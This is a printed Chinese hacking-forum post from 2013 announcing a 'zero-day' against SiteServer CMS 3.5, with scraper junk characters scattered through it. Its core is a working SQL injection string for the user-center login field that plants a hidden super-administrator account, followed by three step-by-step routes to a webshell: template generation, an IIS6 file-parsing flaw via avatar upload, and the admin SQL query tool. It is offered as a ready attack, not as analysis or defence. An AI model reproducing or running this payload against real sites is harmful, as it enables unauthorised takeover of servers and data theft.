中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

---

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版

  O' R  [9 e2 z' s; ^, C6 z* W, Nstieserver官网:www.siteserver.cn
8 C4 {0 G% ]+ A3 G
" s* F, Q* w: W$ l/ j' O
5 m8 i4 D7 y) R  m, i9 o
EXP:

5 q6 h3 s" b0 w直接访问UserCenter/login.aspx


% A3 P  }: _* p/ i
用户名处输入：
. T) D6 r$ g5 D$ Q
  E; U( n4 J5 t% l  \123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


1 i5 }& h( _; n4 `$ w. S" D
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
$ n6 h( ~! X1 N* m$ o6 U- k' `


7 p/ d6 h( @! r  Z1 p5 i# g之后再访问后台SiteServer/login.aspx用插入的用户登陆


, h- @) M7 J! V' m
+ c; n9 c) z; ^; Y4 e8 F& ?7 i后台拿webshell的三种方法：

& `; C, K: e6 x+ [" I5 T% J) ^一、

" g, G+ O2 f- ?9 m站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
; a/ _3 `4 }! H& C3 O" e- x- U# Z6 p
二、
7 |6 i3 R* n8 @( c5 z0 Q
- z( E' n& n3 f+ s" Z( x成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/
; h" q) ]; X6 ]. `5 G
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

三、
1 q0 E/ @4 D) h/ W5 e
3 |$ L0 a1 ~' t6 v- _; E$ [# N5 [系统工具-》实用工具-》机器参数查看
( G! E& n3 \) _0 L; ], S  w, H可以看到数据库类型、名称，WEB路径
8 a9 J5 t7 b/ R
; H/ z$ Q- ]; G系统工具-》数据库工具-》SQL语句查询
% Q" i7 E. ~5 r- P/ {. l( [6 p这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2